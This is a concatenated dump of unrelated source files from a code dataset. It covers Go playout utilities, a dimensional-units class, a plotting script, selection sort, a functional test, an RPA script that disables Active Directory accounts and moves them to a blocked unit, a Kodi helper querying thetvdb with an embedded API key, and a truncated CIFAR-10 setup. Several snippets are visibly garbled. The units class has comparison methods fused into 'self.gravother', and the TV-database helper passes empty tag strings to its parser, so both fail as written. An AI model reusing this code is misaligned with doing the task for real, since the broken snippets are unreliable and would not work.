generate_move_with_filter\n which is more efficient\n \"\"\"\n if pattern:\n pattern_moves = []\n pattern_moves = PatternUtil.generate_pattern_moves(board)\n pattern_moves = PatternUtil.filter_moves(board, pattern_moves, check_selfatari)\n if len(pattern_moves) > 0:\n return pattern_moves, \"Pattern\"\n return GoBoardUtil.generate_random_moves(board, True), \"Random\"\n \n @staticmethod\n def playGame(board, color, **kwargs):\n \"\"\"\n Run a simulation game according to give parameters.\n \"\"\"\n komi = kwargs.pop('komi', 0)\n limit = kwargs.pop('limit', 1000)\n random_simulation = kwargs.pop('random_simulation',True)\n use_pattern = kwargs.pop('use_pattern',True)\n check_selfatari = kwargs.pop('check_selfatari',True) # always false\n if kwargs:\n raise TypeError('Unexpected **kwargs: %r' % kwargs)\n nuPasses = 0\n for _ in range(limit):\n color = board.current_player\n if random_simulation:\n move = GoBoardUtil.generate_random_move(board,color,True)\n else:\n move = PatternUtil.generate_move_with_filter(board,use_pattern,check_selfatari)\n board.play_move(move, color)\n if move == PASS:\n nuPasses += 1\n else:\n nuPasses = 0\n if nuPasses >= 2:\n break\n winner = board.get_final_result() # gogui-final-result.\n return winner\n","sub_path":"pattern_util.py","file_name":"pattern_util.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208096285","text":"# Submitter: shambhut(Thapa, Shambhu)\n# Partner: timotjk1(Kim, Timothy)\n\n# We certify that we worked cooperatively on this programming\n# assignment, according to the rules for pair programming\n\nfrom goody import type_as_str\nfrom math import sqrt\n\n\nclass DimensionError(Exception):\n def __init__(self,message=None):\n Exception.__init__(self,message)\n\n\nclass Dimensional:\n \n #static functions\n \n\n \n def __init__(self,grav, l = 0, m = 0, t = 0):\n self.grav = grav \n self.m = m \n self.l = l \n self.t = t\n \n \n assert type(self.l) ==int and type(self.m) == int and type(self.t) == int\n \n \n \n def __bool__(self):\n \n return self.grav > 0 \n \n def __len__(self):\n return abs(self.l) + abs(self.m) + abs(self.t)\n \n def __repr__(self):\n result = \"Dimensional({},\".format(self.grav)\n\n\n if self.l != 0:\n result += \"l={},\".format(self.l)\n \n if self.m != 0:\n result += \"m={},\".format(self.m)\n \n if self.t != 0:\n result += \"t={},\".format(self.t)\n \n result = result[:-1] + \")\"\n \n return result\n \n \n def __str__(self):\n \n \n return \"{}({},{},{})\".format(self.grav,self.l,self.m, self.t)\n \n def __getitem__(self,index):\n if index not in [ 'value', 'l', 'm', 't', 'd']:\n raise KeyError\n \n if index == 'value':\n return self.grav\n elif index == 'l':\n return self.l\n \n elif index == 'm':\n return self.m\n \n elif index == 't':\n return self.t\n elif index == 'd':\n return (self.l , self.m, self.t)\n \n def format(self, iter):\n res='{}'.format(self.grav)\n if self.l==0 and self.m==0 and self.t==0:\n return res\n \n res+=' '\n \n if self.l>0:\n res+=iter[0]\n if self.l>1:\n res+='**{}'.format(self.l)\n if self.m>0:\n res+=iter[1]\n if self.m>1:\n res+='**{}'.format(self.m)\n if self.t>0:\n res+=iter[2]\n if self.t>1:\n res+='**{}'.format(self.t)\n \n \n if self.l<=0 and self.m<=0 and self.t<=0:\n res+='1'\n \n if self.l<0 or self.m<0 or self.t<0:\n res+='/'\n if self.l<0:\n res+=iter[0]\n if self.l<-1:\n res+='**{}'.format(abs(self.l))\n if self.m<0:\n res+=iter[1]\n if self.m<-1:\n res+='**{}'.format(abs(self.m))\n if self.t<0:\n res+=iter[2]\n if self.t<-1:\n res+='**{}'.format(abs(self.t))\n\n return res\n \n\n \n def __pos__(self):\n return Dimensional(self.grav, self.l,self.m, self.t)\n \n def __neg__(self):\n return Dimensional(self.grav * -1, self.l ,self.m , self.t)\n \n def __add__(self,other):\n \n if type(other) not in [int, float, Dimensional ]:\n raise TypeError(\"type did not match \")\n \n \n if type(other) == Dimensional and ( self.l != other.l or self.m != other.m or self.t != other.t) :\n raise DimensionError\n elif type(other) != Dimensional and (self.l!=0 or self.m!=0 or self.t!=0) :\n raise DimensionError\n elif type(other) == Dimensional and self.l == other.l and self.m == other.m and self.t == other.t : \n \n return Dimensional(self.grav + other.grav,self.l, self.m,self.t)\n \n if (type(other) in [int, float]) and self.l == 0 and self.m == 0 and self.t == 0 : \n \n return Dimensional(self.grav + other)\n \n \n \n \n \n def __radd__(self, left):\n return self.__add__(left)\n \n def __sub__(self, other):\n return self + (-other)\n \n def __rsub__(self, other):\n return -(self-other)\n\n def __mul__(self, other):\n \n if type(other) not in [int, float,Dimensional ]:\n raise TypeError(\"type did not match \")\n \n if type(other) == Dimensional: \n return Dimensional(self.grav * other.grav, self.l+other.l, self.m+other.m,self.t+other.t)\n \n if type(other) in [int, float]: \n \n return Dimensional(self.grav * other, self.l, self.m, self.t)\n \n def __rmul__(self, other):\n return (self*other) \n \n def __truediv__(self, other):\n# return self * (other**-1)\n if type(other) not in [int, float,Dimensional ]:\n raise TypeError(\"type did not match \")\n \n if type(other) == Dimensional: \n \n return Dimensional(self.grav / other.grav, self.l-other.l, self.m-other.m,self.t-other.t)\n \n if (type(other) in [int, float]): \n \n return Dimensional(self.grav/ other, self.l,self.m, self.t)\n else:\n raise DimensionError\n \n def __rtruediv__(self,other):\n if type(other) not in [int, float, Dimensional]:\n raise TypeError('Type did not match')\n return Dimensional(other/self.grav, 0-self.l, 0-self.m, 0-self.t)\n \n def __pow__(self, other):\n if not type(other) in [int, Dimensional]:\n raise TypeError('must be int, Dimensional')\n if type(other)== Dimensional and (len(other))>0:\n raise DimensionError('Cannot be Dimensional with dimensions not equal to 0')\n if not type(other) == int:\n return Dimensional(self.grav**other.grav, self.l*other.grav, self.m*other.grav, self.t*other.grav)\n \n return Dimensional(self.grav**other, self.l*other, self.m*other, self.t*other)\n \n def __eq__(self, other):\n if type(other) in [float, int]:\n return self.grav==other\n if type(other) == Dimensional and ( self.l != other.l or self.m != other.m or self.t != other.t) :\n raise DimensionError('dimensions values must equal each other')\n \n return str(self)==str(other)\n \n def sqrt(self):\n if all([self.l%2==0, self.m%2==0, self.t%2==0]):\n return Dimensional(self.grav**(0.5), int(self.l/2), int(self.m/2), int(self.t/2))\n else:\n raise DimensionError('dimensions must be even')\n \n def __abs__(self):\n return Dimensional(abs(self.grav), self.l, self.m, self.t)\n\n\n def __lt__(self, other):\n \n if type(other) in [float, int]:\n return self.gravother\n if type(other) == Dimensional and self.l == other.l and self.m == other.m and self.t == other.t : \n return self.grav>other.grav\n else:\n raise DimensionError('Dimension values must equal')\n \n def __le__(self,other):\n \n if type(other) in [ Dimensional, int, float]:\n return self < other or self == other\n \n if type(other) == Dimensional and self.l == other.l and self.m == other.m and self.t == other.t : \n return self.grav < other.grav or self.grav == other.grav\n else:\n raise DimensionError('Dimension values must equal')\n \n def __ge__(self,other):\n \n if type(other) in [ Dimensional, int, float]:\n return self > other or self == other\n \n def __setattr__(self, k, v):\n assert 'grav' not in self.__dict__ or 'l' not in self.__dict__ or 'm' not in self.__dict__ or 't' not in self.__dict__,(\"cannot set the attribute it already exists\")\n \n self.__dict__[k] = v\n \n \n \n\nif __name__ == '__main__':\n # You can put your own code to test Dimensional here; for example\n# t = Dimensional(2.5,t=1)\n# g = Dimensional(9.8,l=1,t=-2)\n# d = .5*g*t**2\n# print(d.format(\"mgs\"))\n dless = Dimensional(5)\n 1 + dless #6(0,0,0)\n 1. + dless #6.0(0,0,0)\n g = Dimensional(9.8,1,0,-2)\n \n Dimensional(10,2,0,-2).sqrt()\n\n \n \n #driver tests\n import driver\n driver.default_file_name = 'bsc2.txt'\n# driver.default_show_exception = True\n# driver.default_show_exception_message = True\n# driver.default_show_traceback = True\n driver.driver()\n \n","sub_path":"workspace/program2/dimensional.py","file_name":"dimensional.py","file_ext":"py","file_size_in_byte":8749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105389889","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# ====================\n# Embedding Dimensions\n# ====================\nndim = np.array([25, 50, 100, 200, 300])\nword2vec = np.array([83.120, 82.190, 83.463, 83.507, 83.525])\nglove = np.array([82.253, 82.782, 83.115, 83.457, None])\n\n# plt.title(\"GloVe vs word2vec\")\nplt.xlabel(\"# of embedding dimensions\")\nplt.ylabel(\"% Accuracy\")\n\naxes = plt.gca()\naxes.set_ylim([80, 86])\n#axes.set_xlim([0,100])\n\nline_glove = plt.plot(ndim, word2vec, label=\"word2vec\", marker='o')\nline_word2vec = plt.plot(ndim, glove, label=\"glove\", marker='o')\n\nplt.legend(loc='lower right')\nplt.grid()\n\nplt.savefig(\"embedding_dim.png\")\n\n","sub_path":"cnn_text/plots/plot_embedding_dim.py","file_name":"plot_embedding_dim.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"132221872","text":"\"\"\"\nIdea : extract minimum element then swap it with element at index 0, then at index 1, ...\nkeep the left portion of the list sorted. (actually, at ith step the first i elements are sorted.)\nRemind : Bubble sort keeps the right portion of the list sorted, comparing and swapping consecutive pairs.\n\"\"\"\n\ndef selection_sort(L):\n \"\"\"\n Assumes L is a list of integers\n Mutates L so that it is sorted\n \"\"\"\n for i in range(len(L)-1):\n print('sorting', L)\n shortest = i\n for j in range(i+1, len(L)):\n if L[j] < L[shortest]:\n shortest = j # remember the shortest element\n if shortest != i:\n L[i], L[shortest] = L[shortest], L[i] # swap ith element with the shortest element\n\ndef selection_sort2(L):\n \"\"\"\n Assumes L is a list of integers\n Mutates L so that it is sorted\n Suffix is the right-side unsorted list, prefix is the left-side sorted list.\n \"\"\"\n suffixSt = 0\n while suffixSt != len(L): # suffixSt is the starting index of suffix. O(len(L))\n print('sorting', L)\n for i in range(suffixSt, len(L)): # O(len(L))\n if L[i] < L[suffixSt]:\n L[suffixSt], L[i] = L[i], L[suffixSt]\n suffixSt += 1\n\nL = [2, 4, 1, 6, 5, 7, 9, 8, 3]\nselection_sort(L)\nprint()\nL = [2, 4, 1, 6, 5, 7, 9, 8, 3]\nselection_sort2(L)","sub_path":"Python/SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"653815737","text":"#!/usr/bin/env python\n# plik testów funkcjonalnych --> imitujących aktywność użytkownika\nfrom unittest import skip # dekorator do opuszczania testów\nfrom .base import FunctionalTest\n\n\nclass LayoutAndStylingTest(FunctionalTest):\n\n @skip\n def test_layout_and_styling(self):\n # aśka odwiedza stronę:\n self.browser.get(self.server_url)\n self.browser.set_window_size(1024, 768)\n\n # zauważa ładnie wyśrodkowany formularz:\n inputbox = self.get_item_input_box()\n self.assertAlmostEqual(inputbox.location['x'] +\n inputbox.size['width'] / 2, 512, delta=5)\n","sub_path":"functional_tests/test_layout_and_styling.py","file_name":"test_layout_and_styling.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"230649789","text":"import datetime\r\nfrom datetime import datetime\r\nfrom pyPythonRPA.Robot import pythonRPA\r\nimport pyautogui\r\nimport wmi\r\nfrom pyautogui import*\r\n\r\nimport win32api\r\nimport win32con\r\nimport time\r\n\r\nkeys = {\r\n \"left\" : win32con.VK_LEFT,\r\n \"right\" : win32con.VK_RIGHT,\r\n \"up\" : win32con.VK_UP,\r\n \"down\" : win32con.VK_DOWN,\r\n \"shift\" : win32con.VK_SHIFT\r\n}\r\n\r\ndef press_key(key, delay=0.1):\r\n if key in keys:\r\n win32api.keybd_event(keys[key], 0, win32con.KEYEVENTF_EXTENDEDKEY, 0)\r\n pythonRPA.keyboard.press(\"down\", 10)\r\n time.sleep(delay)\r\n win32api.keybd_event(keys[key], 0, win32con.KEYEVENTF_KEYUP, 0)\r\n else:\r\n print(\"KEY NOT AVAILABLE\")\r\n\r\npress_key(\"shift\", 5)\r\npythonRPA.keyboard.press(\"Shift\")\r\ndef block(names,log_table):\r\n # start Active Directory\r\n pythonRPA.keyboard.press('win + R')\r\n Run = pythonRPA.bySelector([{\"title\": \"Run\", \"backend\": \"win32\"}])\r\n Run.wait_appear(2)\r\n pythonRPA.keyboard.write('dsa.msc')\r\n pythonRPA.keyboard.press('Enter')\r\n\r\n # clicking the SEARCH button to open the search window\r\n AD_main = pythonRPA.bySelector(\r\n [{\"title\": \"Active Directory Users and Computers\", \"class_name\": \"MMCMainFrame\", \"backend\": \"win32\"}])\r\n AD_main.wait_appear(5)\r\n AD_main.set_focus()\r\n AD_main.maximize()\r\n print(\"Active Directory opened well!\")\r\n\r\n #Action click\r\n pyautogui.click(62, 36)\r\n #change_domain click\r\n while 1:\r\n try:\r\n x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\change_domain.png')\r\n pyautogui.click(x, y)\r\n print('change domain clickd !')\r\n pythonRPA.sleep(2)\r\n break\r\n except Exception as e:\r\n print(e)\r\n pythonRPA.keyboard.press('Enter')\r\n pythonRPA.sleep(2)\r\n # # click hcsbk\r\n # pythonRPA.keyboard.press('down')\r\n # pythonRPA.sleep(2)\r\n # pythonRPA.keyboard.press('Enter')\r\n while 1:\r\n try:\r\n x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\hcsbk.png')\r\n pyautogui.doubleClick(x, y)\r\n pythonRPA.sleep(2)\r\n print('clicked hcsbk well !')\r\n break\r\n except Exception as e:\r\n print(e)\r\n\r\n while 1:\r\n try:\r\n x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\SEARCH.png')\r\n pyautogui.doubleClick(x, y)\r\n break\r\n except Exception as e:\r\n print(e)\r\n find_users = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n find_users.wait_appear(2)\r\n find_users.set_focus()\r\n find_users.maximize()\r\n\r\n for name in names:\r\n try:\r\n # log_ad_status = \"Success\"\r\n # log_ad_comment = \"\"\r\n success = 0\r\n # searching the accounts by full names\r\n if name != None and name == 'test test test':\r\n search_by_name = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 152},{\"ctrl_index\": 7}])\r\n clear_button = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 14}])\r\n clear_button.click()\r\n pythonRPA.keyboard.press('Enter')\r\n search_by_name.wait_appear(1)\r\n search_by_name.click()\r\n pythonRPA.keyboard.write(name)\r\n pythonRPA.sleep(1)\r\n search_ok = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 12}])\r\n search_ok.click()\r\n pythonRPA.sleep(3)\r\n # clicking the result\r\n found = False\r\n for i in range(5):\r\n try:\r\n x,y = pyautogui.locateCenterOnScreen(r'.\\Utils\\found.PNG')\r\n found = True\r\n break\r\n except Exception as e:\r\n print(e)\r\n\r\n if found:\r\n x = 178\r\n y = 340\r\n pyautogui.rightClick(x, y)\r\n\r\n # make an account disable\r\n for i in range(5):\r\n try:\r\n a,b = pyautogui.locateCenterOnScreen(r'.\\Utils\\enable_condition.png')\r\n for i in range(4):\r\n pythonRPA.keyboard.press('down')\r\n print(a,b)\r\n pythonRPA.keyboard.press('Enter')\r\n pythonRPA.sleep(1)\r\n pythonRPA.keyboard.press('Enter')\r\n is_enable = True\r\n break\r\n except: continue\r\n\r\n #\r\n success += 1\r\n print(success)\r\n\r\n # Удаляем члены групп\r\n # открытие свойств\r\n pyautogui.rightClick(x, y)\r\n pythonRPA.keyboard.press('up arrow')\r\n pythonRPA.sleep(1)\r\n pythonRPA.keyboard.press('Enter')\r\n pythonRPA.sleep(3)\r\n\r\n name_variants = get_profile_name(name)\r\n for i in range(len(name_variants)):\r\n try:\r\n user_profile = pythonRPA.bySelector(\r\n [{\"title\":name_variants[i] + \" Properties\", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n user_profile.set_focus()\r\n name = name_variants[i]\r\n break\r\n except Exception as e:\r\n print(e)\r\n\r\n while 1:\r\n try:\r\n x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\member_of.png')\r\n pyautogui.doubleClick(x, y)\r\n break\r\n except Exception as e:\r\n print(e)\r\n domain_sub_group = pythonRPA.byImage(r'.\\Utils\\domain_users.png')\r\n\r\n n = 0\r\n\r\n try:\r\n sub_group = pythonRPA.bySelector(\r\n [{\"title\": name + \" Properties\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 17}, {\"ctrl_index\": 2}])\r\n sub_group.wait_appear(1)\r\n sub_group.click()\r\n pythonRPA.keyboard.press('up')\r\n press_key(\"shift\", 5)\r\n pythonRPA.keyboard.press(\"Shift\")\r\n remove_button = pythonRPA.bySelector(\r\n [{\"title\": name + \" Properties\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 0},\r\n {\"ctrl_index\": 4}])\r\n remove_button.click()\r\n pythonRPA.keyboard.press('left')\r\n pythonRPA.sleep(1)\r\n pythonRPA.keyboard.press('Enter')\r\n warning = pythonRPA.bySelector(\r\n [{\"title\": \"Active Directory Domain Services\", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n if (warning.is_exists()):\r\n pythonRPA.keyboard.press('Enter')\r\n ok = pythonRPA.bySelector([{\"title\":name+\" Properties\",\"class_name\":\"#32770\",\"backend\":\"win32\"},{\"ctrl_index\":12}])\r\n ok.click()\r\n pythonRPA.keyboard.press('Enter')\r\n except Exception as e:\r\n pythonRPA.keyboard.press('Enter')\r\n break\r\n success += 1\r\n print(success)\r\n\r\n # move this account to th blocked accounts\r\n find_users.set_focus()\r\n find_users.maximize()\r\n clear_button = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 14}])\r\n clear_button.click()\r\n pythonRPA.keyboard.press('Enter')\r\n search_by_name.wait_appear(1)\r\n search_by_name.click()\r\n pythonRPA.keyboard.write(name)\r\n pythonRPA.sleep(1)\r\n search_ok = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 12}])\r\n search_ok.click()\r\n pythonRPA.sleep(3)\r\n\r\n # clicking the result\r\n x = 178\r\n y = 340\r\n pyautogui.rightClick(x, y)\r\n search_by_name.wait_appear(1)\r\n search_by_name.click()\r\n pyautogui.rightClick(x, y)\r\n for i in range(6):\r\n pythonRPA.keyboard.press('down arrow')\r\n pythonRPA.keyboard.press('Enter')\r\n pythonRPA.sleep(1)\r\n move_to_block = pythonRPA.bySelector([{\"title\": \"Move \", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n move_to_block.wait_appear(1)\r\n move_to_block.set_focus()\r\n for i in range(10):\r\n pythonRPA.keyboard.press('down arrow')\r\n pythonRPA.keyboard.press('Enter')\r\n print(name, 'Account added to BLOCK sucsessfully !')\r\n pythonRPA.sleep(1)\r\n success += 1\r\n print(success)\r\n if success == 3:\r\n log_table.append([name, \"Active Directory\", \"Заблокирован\", \"\", datetime.now().strftime(\"%H:%M:%S\")])\r\n else:\r\n log_table.append([name, \"Active Directory\", \"Не заблокирован\", \"Сотрудник не найден в системе\", datetime.now().strftime(\"%H:%M:%S\")])\r\n except Exception as e:\r\n log_table.append([name, \"Active Directory\", \"Не заблокирован\", \"Техническая ошибка\", datetime.now().strftime(\"%H:%M:%S\")])\r\n try:\r\n f = wmi.WMI()\r\n for p in f.Win32_Process():\r\n if p.name == 'mmc.exe':\r\n p.Terminate()\r\n except Exception as e:\r\n print(e)\r\ndef get_profile_name(name):\r\n name2 = name.split(' ')\r\n name_variants=[]\r\n result = \"\"\r\n for i in range(len(name2)):\r\n if i:\r\n result+=' '+name2[i]\r\n else: result+=name2[i]\r\n name_variants.append(result)\r\n print(name_variants)\r\n return name_variants\r\n\r\n\r\n","sub_path":"AD.py","file_name":"AD.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"499221336","text":"from resources.scrapers import scrapers\nimport urllib2\nimport os.path\nimport xbmc\nimport xbmcaddon\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n \n try:\n import unicodedata\n unicodedata.numeric(s)\n return True\n except (TypeError, ValueError):\n pass\n \n return False\n\ndef isThatSxxExx (string):\n if (len(string) != 6) and (len(string) != 3):\n return False\n else:\n if (len(string) == 6):\n if (string[0].isdigit() == True):\n return False\n elif (string[1].isdigit() == False):\n return False\n elif(string[2].isdigit() == False):\n return False\n elif (string[3].isdigit() == True):\n return False\n elif (string[4].isdigit() == False):\n return False\n elif (string[5].isdigit() == False):\n return False\n else:\n return True\n elif (len(string) == 3):\n if (string[0].isdigit() == False):\n return False\n elif (string[1].isdigit() == False):\n return False\n elif(string[2].isdigit() == False):\n return False\n else:\n return True\n\ndef extract(text, startText, endText):\n start=text.find(startText,0)\n if start!=-1:\n start=start+startText.__len__()\n end=text.find(endText,start+1)\n if end!=-1:\n return text[start:end]\n return None\n\ndef extractAll(text, startText, endText):\n result = []\n start = 0\n pos = text.find(startText, start)\n while pos != -1:\n start = pos + startText.__len__()\n end = text.find(endText, start)\n result.append(text[start:end].replace('\\n', '').replace('\\t', '').lstrip())\n pos = text.find(startText, end)\n return result\n\ndef getEpisodeandSeason (SxxExx):\n string = list(SxxExx)\n Season = int('0')\n Episode = int('0')\n SeasonEpisode = []\n if (len(SxxExx) == 6):\n Season = int(string[1])*10 + int(string[2])\n Episode = int(string[4])*10 + int(string[5])\n if (len(SxxExx) == 3):\n Season = int(string[0])\n Episode = int(string[1])*10 + int(string[2])\n\n SeasonEpisode = [Season, Episode]\n return SeasonEpisode\n\ndef getRealNames (title):\n\tchange = True\n\tstrDummy = title\n\tstrDummy = title.replace(\".\", \" \")\n\treturnedTitle = ''\t\t\n\tlistString = strDummy.split()\n\tShowName = '' \t\t\n\tSxxExx = '' \t\t\n\tfor i in listString:\n\t\tif (change == True):\n\t\t\tif (isThatSxxExx(i) == True):\n\t\t\t\tchange = False\n\t\t\t\tShowName = returnedTitle\n\t\t\t\tSxxExx = i\n\t\t\treturnedTitle = returnedTitle + i + ' '\n\t\t\t\n\tnames = [ShowName, SxxExx, returnedTitle]\t\t\n\treturn names\t\n\ndef isvalid (title):\n checkstring = title\n if (checkstring.find('.srt') != -1):\n return False\n if (checkstring.find('.png') != -1):\n return False\n if (checkstring.find('.jpg') != -1):\n return False\n if (checkstring.find('.png') != -1):\n return False\n if (checkstring.find('.txt') != -1):\n return False\n if (checkstring.find('.nfo') != -1):\n return False\n return True\n\n\ndef textDB (Showname):\n __addon__ = xbmcaddon.Addon(id='plugin.video.torrenter')\n __addonprofile__= xbmc.translatePath(__addon__.getAddonInfo('profile')).decode('utf-8')\n filename = __addonprofile__ + Showname+\".txt\"\n if os.path.exists(filename) == False:\n show_file = open(filename, \"w\")\n showstr = Showname.replace(\" \", \"+\")\n url = \"http://thetvdb.com/api/GetSeries.php?seriesname=\"\n url = url+showstr\n response = urllib2.urlopen(url)\n content = response.read()\n id = extract(content, '', '')\n urln = \"http://thetvdb.com/api/CEE06027D4C29B06/series/\"+str(id)+\"/all/he.xml\"\n responsen = urllib2.urlopen(urln)\n contentn = responsen.read()\n show_file.write(contentn)\n\n show_file = open(filename, 'r')\n database = show_file.read()\n show_file.close() \n return database\n\ndef getInfo (seriesname):\n checkstring = seriesname\n name = seriesname\n plot = 'none'\n aired = 'none'\n thumbnail = ''\n Anames = getRealNames(seriesname)\n if isvalid(seriesname) == True:\n if isThatSxxExx(Anames[1]) == True:\n contentn = textDB(Anames[0])\n paragraphs = extractAll(contentn, '', '')\n SeasonEpisode = getEpisodeandSeason(Anames[1])\n SeasonNumber = str(SeasonEpisode[0])\n EpisodeNumber = str(SeasonEpisode[1])\n EpisodeStart = ''\n EpisodeEnd = ''\n SeasonStart = ''\n SeasonEnd = ''\n episodeoptionone = EpisodeStart+EpisodeNumber+EpisodeEnd\n episodeoptiontwo = EpisodeStart+EpisodeNumber+'.0'+EpisodeEnd\n for i in paragraphs:\n if episodeoptionone in i or episodeoptiontwo in i: \n if SeasonStart+SeasonNumber+SeasonEnd in i:\n plot = extract(i, '', '')\n plot = plot.replace(\""\", '\"')\n name = Anames[1]+\" \"+extract(i, '', '')\n thumbnail = 'http://thetvdb.com/banners/'+extract(i, '', '')\n\t\t\t\n info = [name, plot, thumbnail]\n return info\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"73946314","text":"with open(\"input_sort_count.txt\",mode=\"r\",encoding=\"utf-8\") as infile:\n word=infile.read()\n\nlistword=word.split('\\n') # list化\n\nwhile '' in listword: # 移除空白行\n listword.remove('')\n\nimport re\nl1=[re.sub(r\"\\t.*$|\\s.*$\",r\"\",i) for i in listword] # 刪除後面編碼,計算前面字數\n\nlenl1=[len(line) for line in l1]\n\nlistall=list(zip(lenl1,listword)) # 合併字數列和原文 #該合併不會合併相同的\n\nlistall=sorted(listall,key=lambda x:x[0]) # 按字數調整順序 # 與 excel 相同,不打亂原先順序\n\nn, v = zip(*listall) # 轉回兩個 list (實際是兩個 tuple)\nv=\"\\n\".join(v) # 轉成字串(string)形式\n\nwith open(\"output_1_sort_count.txt\",mode=\"w\",encoding=\"utf-8\") as outfile:\n outfile.write(v)\n","sub_path":"Sort by word count and name/1_sort_by_word_count_與excel相似.py","file_name":"1_sort_by_word_count_與excel相似.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"269712334","text":"######################################################\n# Alexnet on CIFAR10\n# by: xdai @ 05/15/2017\n######################################################\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\n\nimport keras\nimport time\nimport gc\nfrom keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimport prepare_cifar10\nfrom lib.mathOperation import randMask, rRangedMask, softmax, d_softmax, empty_count\nfrom lib.mathOperation import normalize, conv2d, conv2drelu, maxpool2d\nfrom lib.img_lib import deform, deskew, resize, dist_lecun, load_dist_mnist\nfrom nets.cifar10_nets import alexnet_cifar10\nfrom lib.visual import six_figures\t\n\nfrom config import *\n\ndata_file = '/home/xdai/cifar10/'\n\n#cifar10 = prepare_cifar10.read_data_sets(reshape=False)\ncategories = [\"airplane\", \"automobile\", \"bird\", \"cat\", \"deer\", \"dog\", \"frog\", \"horse\", \"ship\", \"truck\"]\n\nETA = 0.08\nEPSINIT = 0.05\nBATCHSIZE = 32\nL2_NORM = 0.000001\n\nclass tf_classifier():\n\tdef __init__(self, bridge=False, eta=ETA, epsinit=EPSINIT, batchsize=BATCHSIZE, show=True):\n\t\tself.bridge = bridge\n\t\tself.eta = eta\n\t\tself.epsinit = epsinit\n\t\tself.batchsize = batchsize\n\t\tself.valbatchsize = 500\n\t\tself.show = show\n\n\t\tself.tsave = 100000\n\t\tself.tshow = 5000\n\t\tself.tmax = 15000000\n\t\tself.tnow = 0\n\t\tself.t0 = time.time()\n\n\t\tself.beta = L2_NORM\n\t\tself.train_error = 1.0\n\t\tself.record = 0.5\n\t\tself.monitor = [[0.,0.,0.,0.]]\n\n\t\tself.stage = 0 # 0-> child 1-> teen 2->adult\n\n\tdef setData(self):\n\t\t(self.x_train, self.y_train), (self.x_test, self.y_test) = cifar10.load_data()\n\t\tself.y_train = np_utils.to_categorical(self.y_train, 10)\n\t\tself.y_test = np_utils.to_categorical(self.y_test, 10)\n\n\t\tself.train_datagen = ImageDataGenerator(\n\t\t\tfeaturewise_center=False, # set input mean to 0 over the dataset\n\t\t\tsamplewise_center=False, # set each sample mean to 0\n\t\t\tfeaturewise_std_normalization=False, # divide inputs by std of the dataset\n\t\t\tsamplewise_std_normalization=False, # divide each input by its std\n\t\t\tzca_whitening=False, # apply ZCA whitening\n\t\t\trotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n\t\t\twidth_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n\t\t\theight_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n\t\t\tzoom_range=0.2,\n\t\t\thorizontal_flip=True, # randomly flip images\n\t\t\tvertical_flip=False) # randomly flip images\n\t\tself.train_datagen.fit(self.x_train)\n\n\t\tself.vali_datagen = ImageDataGenerator(\n\t\t\tfeaturewise_center=False, # set input mean to 0 over the dataset\n\t\t\tsamplewise_center=False, # set each sample mean to 0\n\t\t\tfeaturewise_std_normalization=False, # divide inputs by std of the dataset\n\t\t\tsamplewise_std_normalization=False, # divide each input by its std\n\t\t\tzca_whitening=False, # apply ZCA whitening\n\t\t\trotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n\t\t\twidth_shift_range=0.0, # randomly shift images horizontally (fraction of total width)\n\t\t\theight_shift_range=0.0, # randomly shift images vertically (fraction of total height)\n\t\t\thorizontal_flip=False, # randomly flip images\n\t\t\tvertical_flip=False) # randomly flip images\n\t\tself.vali_datagen.fit(self.x_test)\n\n\t\tgc.collect()\n\t\tprint('Data loading complete!')\n\t\treturn None\n\n\tdef 